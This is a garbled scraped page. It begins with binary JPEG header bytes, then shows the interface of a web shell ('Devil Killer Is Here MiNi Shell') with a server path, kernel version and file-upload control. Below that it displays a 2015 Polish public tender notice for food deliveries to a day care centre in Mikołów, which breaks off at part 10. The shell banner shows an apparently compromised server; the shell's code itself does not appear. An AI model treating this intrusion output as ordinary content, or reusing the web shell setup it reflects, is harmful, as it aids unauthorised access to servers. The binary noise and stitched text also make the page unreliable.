JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151110/302330-N-2015.html

<p class="kh_header"><b>Mikołów: Dostawa produktów żywnościowych na potrzeby żywienia w Dziennym Domu Pomocy w Mikołowie</b><br>
<b>Numer ogłoszenia: 302330 - 2015; data zamieszczenia: 10.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dzienny Dom Pomocy , ul. Konstytucji 3 Maja 12, 43-190 Mikołów, woj. śląskie, tel. 32 2260090, faks 32 2260090.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych na potrzeby żywienia w Dziennym Domu Pomocy w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Dostawa mięsa i przetworów mięsnych,Część II - Dostawa mięsa drobiowego, podrobów drobiowych, przetworów drobiowych,Część III - Dostawa pieczywa i wyrobów piekarsko-ciastkarskich,Część IV - Dostawa artykułów sypkich (mąki, kasze, makarony, groch, fasola),Część V - Dostawa nabiału,Część VI - Dostawa tłuszczy,Część VII - Dostawa przypraw, przetworów owocowo-warzywnych,Część VIII - Dostawa warzyw i owoców świeżych,Część IX - Dostawa mrożonek,Część X - Dostawa konserw rybnych,Część XI - Dostawa konserw mięsnych oraz pasztecików,Część XII - Dostawa ryb świeżych i mrożonych,Część XIII - Dostawa jaj..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5, 15.13.14.00-9, 15.13.11.35-0, 15.11.20.00-6, 15.81.10.00-6, 15.81.20.00-3, 15.43.10.00-8, 15.62.00.00-0, 15.83.10.00-2, 15.61.00.00-7, 15.50.00.00-3, 15.87.00.00-7, 15.33.00.00-0, 03.22.20.00-3, 03.22.10.00-6, 15.33.11.70-9, 15.24.00.00-2, 15.13.13.10-1, 15.22.00.00-6, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość zmiany postanowień umowy w następujących przypadkach:a)zmiany osób, które zgodnie z art. 26 ust 2b ustawy Pzp - będą podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia, w takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego warunki określone przez Zamawiającego w SIWZ wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów,b)zmiany osób prowadzących nadzór nad realizacją umowy ze strony Zamawiającego bądź Wykonawcy,c)zmian podmiotowych po stronie Wykonawcy, związanych z sukcesją uniwersalną, w wyniku której prawa przysługujące jednemu podmiotowi przechodzą na inny podmiot w wyniku zdarzenia prawnego,d)wystąpienia okoliczności uniemożliwiających świadczenie usług wskutek działania siły wyższej (za przypadek siły wyższej uznaje się nieprzewidziane wydarzenia, które wystąpią niezależnie od woli Stron i po zwarciu Umowy, a którym Strony nie mogły zapobiec przy dochowaniu należytej staranności udaremniając całkowicie lub częściowo wypełnienie zobowiązań umownych, jak w szczególności pożar, powódź, strajk, wojna, mobilizacja, działania wojenne wroga, rekwizycja, embargo lub Zarządzenia władz)e)zakończenia produkcji danego artykułu żywnościowego, określonego w SIWZ oraz rozpoczęcia produkcji innego artykułu żywnościowego co najmniej o tych samych lub lepszych walorach jakościowych i smakowych.
2. Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie propozycji Wykonawcy wykazującej zasadność wprowadzenia zmian i zgody Zamawiającego wyrażonej  w formie pisemnej na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego.
3. Przewiduje się możliwość zmiany zawartej umowy w stosunku do treści, na podstawie której dokonano wyboru Wykonawcy w zakresie zmiany wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług (VAT) - wynagrodzenie ulegnie zmianie stosownie  do zmiany stawki podatku bez zmiany wynagrodzenia netto, bez konieczności podpisywania aneksu do umowy, począwszy od daty wejścia w życie powołania zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dzienny Dom Pomocy, ul. Konstytucji 3 Maja 12, 43-190 Mikołów, tel/fax 032 2260090.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2015 godzina 09:00, miejsce: Dzienny Dom Pomocy, ul. Konstytucji 3 Maja 12, 43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa i przetworów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Flaki krojone blanszowane-kg 250 (2.)Boczek wędzony surowy-kg 50 (3.)Galareta wieprzowa-kg 350 (4.)Karczek wp b/k-kg 600 (5.)Kiełbasa do przygotowania na grillu (bez względu na nazwę)-kg 1900 (6.)Kiełbasa kminkowa-kg 80 (7.)Kiełbasa podwawelska-kg 500 (8.)Metka łososiowa paczkowana 150g-200 g-kg 300 (9.)Metka cebulowa paczkowana 150g-200 g-kg 200 (10.)Mortadela-kg 600 (11.)Mielonka wieprzowa-kg 900 (12.)Kiełbasa śląska-kg 300 (13.)Kiełbasa zwyczajna-kg 1000 (14.)Kości świeże-kg 200 (15.)Kaszanka w jelicie cienkim tzw. krupniok 150-200g -kg 500 (16.)Łopatka wieprzowa b/k-kg 1100 (17.)Kiełbasa szynkowa-kg 100 (18.)Ozory wieprzowe-kg 100 (19.)Kiełbasa biała parzona-kg 80 (20.)Parówki wieprzowe cienkie-kg 850 (21.)Parówki wieprzowe grube-kg 650 (22.)Pasztetowa zwykła-kg 550 (23.)Płucka wieprzowe czyste-kg 200 (24.)Salceson zwykły-kg 450 (25.)Słonina wędzona bez skóry-kg 150 (26.)Wątroba wieprzowa-kg 200 (27.)Szynka gotowana-kg 30 (28.)Rolada boczkowa-kg 150 (29.)Nerki-kg 100 (30.)Kiełbasa żywiecka-kg 350..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5, 15.13.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obnizonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa drobiowego, podrobów drobiowych, przetworów drobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Filet z kurczaka-kg 150 (2.)Udko z kurczaka-kg 600 (3.)Wątróbka drobiowa-kg 250 (4.)Porcja rosołowa-kg 100 (5.)Szynka z drobiu-kg 100 (6.)Polędwica drobiowa-kg 500 (7.)Kiełbasa drobiowa do grzania-kg 800 (8.)Kurczak cały-kg 250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.13.11.35-0, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywa i wyrobów piekarsko-ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Chleb zwykły, duży o wadze 900 g, znakowany etykietami lub banderolami
z nadrukiem zawierającym dane: nazwę i adres producenta, rodzaj pieczywa, masę jednostkową szt 13500 (2.)Bułka zwykła 90 g szt 3500 (3.)Drożdżówka,pączek (ciasto drożdżowe nadziewane marmoladą, budyniem, serem, makiem) szt 1500 (4.)Bułka tarta kg 50 (5.)Mąka żurek kg 100 (6.)Chleb krojony, duży o wadze 900 g, znakowany etykietami lub banderolami z nadrukiem zawierającym dane: nazwę i adres producenta, rodzaj pieczywa, masę jednostkową, datę minimalnej trwałości do pożycia, opakowanie foliowe - każda sztuka osobno szt 4400 (7.)Baton 400 g typu wek szt 80 (8.)Chałka duża szt 150 (9.)Bułka maślana 70 g szt 1500 (10.)Kołocz (ciasto drożdżowe z serem) kg 13 (11.)Kołocz (ciasto drożdżowe z makiem) kg 13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykułów sypkich(mąki,kasze,makarony,groch,fasola).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Cukier - 1 kg, kg 700 (2.)Cukier puder - 0,5 kg,kg 12 (3.)Cukier waniliowy-10 g
szt 200 (4.)Kasza gryczana kg 150 (5.)Kasza jęczmienna kg 400 (6.)Kasza manna kg 240 (7.)Makaron typu świdry kg 600 (8.)Makaron typu zacierka 250 g, szt 240 (9.)
Makaron typu nitka 250 g, szt 460 (10.)Mąka pszenna typ 650 kg 900 (11.)Mąka tortowa typ 450 kg 240 (12.)Mąka ziemniaczana kg 30 (13.)Proszek do pieczenia 12 g
szt 200 (14.)Ryż kg 500 (15.)Sól kg 160 (16.)Budyń 40 g, szt 250 (17.)Groch łuskany
kg 240 (18.)Fasola Jaś kg 250 (19.)Fasola biała perłowa kg 80 (20.)Herbata granulowana czarna 90 g. szt 12 (21.)Herbata owocowa expresowa min. 25 sztuk,
szt 40 (22.)Galaretka 75 g szt 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.83.10.10-2, 15.89.90.00-6, 15.33.20.00-4, 15.62.00.00-0, 15.86.30.00-5, 15.33.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Śmietana 18% 0,33 litra - kubek szt 150 (2.)Mleko 0,5 % 1 litr - karton szt 1200 (3.)Kefir 2% 0,4 litra - kubek szt 1300 (4.)Twaróg chudy 200 g szt 2700 (5.)Ser topiony 100 g szt 4000 (6.)Ser topiony krążek 140 g szt 650 (7.)Ser homogenizowany 125 g szt 2000 (8.)Ser twardy żółty typu gouda kg 120 (9.)Twaróg sernikowy 1 kg - wiaderko szt 130 (10.)Ser tostowy plastry 130 g szt 2500 (11.)Jogurt 1,5%  naturalny 0,33 litra - kubek szt 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa tłuszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Olej uniwersalny-litr 450 (2.)Smalec wieprzowy 200 g szt 2200 (3.)Masło 200 g o zawartości tłuszczu min. 82% szt 1000 (4.)Margaryna do smarowania pieczywa
o zawartości tłuszczu nie mniej niż 39 % - 500 g szt 1500 (5.)Mix tłuszczowy do smarowania pieczywa 200 g o zawartości tłuszczu nie mniej niż 50% szt 11000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.53.00.00-2, 15.43.10.00-8, 15.41.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa przypraw, przetworów owocowo-warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Barszcz czerwony koncentrat 330 ml szt 15 (2.)Brzoskwinie w syropie - puszka 820 ml szt 120 (3.)Ćwikła z chrzanem 400 g szt 6 (4.)Chrzan 170 g szt 50 (5.)Cynamon 15 g szt 20 (6.)Gałka muszkatołowa mielona 10 g szt 50 (7.)Imbir mielony 15 g szt 50 (8.)Kminek mielony kg 3 (9.)Kwasek cytrynowy 100 g szt 5 (10.)Przyprawa do potraw (warzywa suszone z solą) kg 600 (11.)Koncentrat pomidorowy 30% - 1 kg szt 600 (12.)Liście laurowe kg 4 (13.)Przyprawa do zup w płynie litr 480 (14.)Majeranek kg 7 (15.)Majonez 400 g szt 15 (16.)Musztarda 200 g
szt 30 (17.)Marmolada 500 g szt 70 (18.)Dżem jednorazowy 25 g szt 3500 (19.)Dżem 280 g szt 1300 (20.)Czosnek granulowany kg 17 (21.)Miód jednorazowy 15 g szt 500 (22.)Ocet 10% 1 litr szt 40 (23.)Pieprz mielony kg 3 (24.)Papryka słodka mielona kg 9
(25.)Syrop owocowy 400 ml szt 24 (26.)Susz natki pietruszki kg 10 (27.)Susz kopru kg 7 (28.)Ziele angielskie kg 6,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa warzyw i owoców świeżych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Buraki kg 360 (2.) Botwinka pęczek szt 70 (3.)Cebula zwykła kg 200 (4.)Cytryna kg 2 (5.)Jabłka kg 200 (6.)Kalafior szt 100 (7.)Kalarepa szt 90 (8.)Kapusta biała kg 400 (9.)Kapusta biała młoda szt 200 (10.)Kapusta czerwona kg 110 (11.)Kapusta kiszona kg 600 (12.)Kapusta włoska szt 30 (13.)Koperek zielony - pęczek szt 530 (14.)Ogórek kiszony kg 300 (15.)Ogórek konserwowy 0,9 - 1 litr szt 50 (16.)Ogórek zielony szklarniowy kg 160 (17.)Pieczarki kg 180 (18.)Pietruszka korzeń kg 30 (19.)Pietruszka zielona - pęczek szt 100 (20.)Pomidory kg 550 (21.)Por szt 30 (22.)Rzodkiewka - pęczek szt 30 (23.)Sałata zielona szt 5 (24.)Seler korzeń kg 30 (25.)Sałata lodowa szt 30 (26.)Szczypiorek - pęczek szt 20 (27.)Śliwka suszona kg 5 
(28.)Truskawka kg 30 (29.)Ziemniaki kg 12000 (30.)Owoce suszone kg 1,5 (31.)Marchew kg 80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.10-6, 03.22.20.00-3, 03.21.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Zupa jarzynowa 6 składników kg 550 (2.)Włoszczyzna paski kg 2600 (3.)Brokuły kg 500 (4.)Brukselka kg 100 (5.)Fasola szparagowa zielona kg 400 (6.)Fasola szparagowa żółta kg 150 (7.)Mieszanka królewska kg 200 (8.)Szpinak kg 450 (9.)Kalafior kg 480 (10.)Marchew kostka kg 300 (11.)Mieszanka kompotowa kg 300 (12.)Groszek zielony kg 80 (13.)Barszcz ukraiński kg 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa konserw rybnych.</p>
